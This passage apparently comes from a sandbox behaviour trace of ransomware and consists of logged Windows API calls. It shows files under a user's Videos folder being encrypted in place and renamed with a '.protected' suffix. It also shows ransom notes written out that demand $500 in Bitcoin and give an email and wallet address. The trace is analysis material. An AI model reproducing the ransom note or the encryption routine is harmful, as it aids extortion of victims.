(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.916] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.916] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.916] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.916] CloseHandle (hObject=0xd4) returned 1 [0092.916] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.916] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.916] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\RESTORE_FILES.txt") returned 66 [0092.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.917] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.917] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.918] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.918] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.918] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.918] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.918] CloseHandle (hObject=0xb4) returned 1 [0092.919] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.919] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.919] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.919] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.919] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.919] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0092.919] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.919] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.920] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.920] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.920] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.920] CloseHandle (hObject=0xb4) returned 1 [0092.921] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.protected") returned 62 [0092.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.protected")) returned 1 [0092.922] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Windows") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Program Files") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="Program Files (x86)") returned -1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="$Recycle.bin") returned 1 [0092.922] lstrcmpiW (lpString1="eGbOzuQ7K1yF.flv", lpString2="System Volume Information") returned -1 [0092.922] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.922] StrStrIW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".protected") returned 0x0 [0092.922] lstrcmpW (lpString1="eGbOzuQ7K1yF.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.922] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".txt") returned 0x0 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".rar") returned 0x0 [0092.923] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv") returned 57 [0092.923] StrStrW (lpFirst="eGbOzuQ7K1yF.flv", lpSrch=".zip") returned 0x0 [0092.923] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.923] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.924] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.924] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.924] CloseHandle (hObject=0xb4) returned 1 [0092.924] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv.protected") returned 67 [0092.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eGbOzuQ7K1yF.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\egbozuq7k1yf.flv.protected")) returned 1 [0092.925] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Windows") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Program Files") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="Program Files (x86)") returned -1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="$Recycle.bin") returned 1 [0092.925] lstrcmpiW (lpString1="m9MLQVuZ", lpString2="System Volume Information") returned -1 [0092.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ") returned 49 [0092.925] lstrcmpW (lpString1="m9MLQVuZ", lpString2=".") returned 1 [0092.925] lstrcmpW (lpString1="m9MLQVuZ", lpString2="..") returned 1 [0092.925] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\*") returned 51 [0092.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.926] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\.") returned 51 [0092.926] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.926] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.926] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.926] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\..") returned 52 [0092.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.926] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Windows") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Program Files") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="Program Files (x86)") returned -1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.926] StrStrIW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".protected") returned 0x0 [0092.926] lstrcmpW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".txt") returned 0x0 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".rar") returned 0x0 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".zip") returned 0x0 [0092.927] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.928] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.928] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.928] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.929] CloseHandle (hObject=0xd4) returned 1 [0092.929] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv.protected") returned 84 [0092.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv.protected")) returned 1 [0092.930] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Windows") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Program Files") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Program Files (x86)") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="$Recycle.bin") returned 1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="System Volume Information") returned -1 [0092.930] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.930] StrStrIW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".protected") returned 0x0 [0092.930] lstrcmpW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.930] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".txt") returned 0x0 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".rar") returned 0x0 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".zip") returned 0x0 [0092.931] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.932] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.933] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.933] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.933] CloseHandle (hObject=0xd4) returned 1 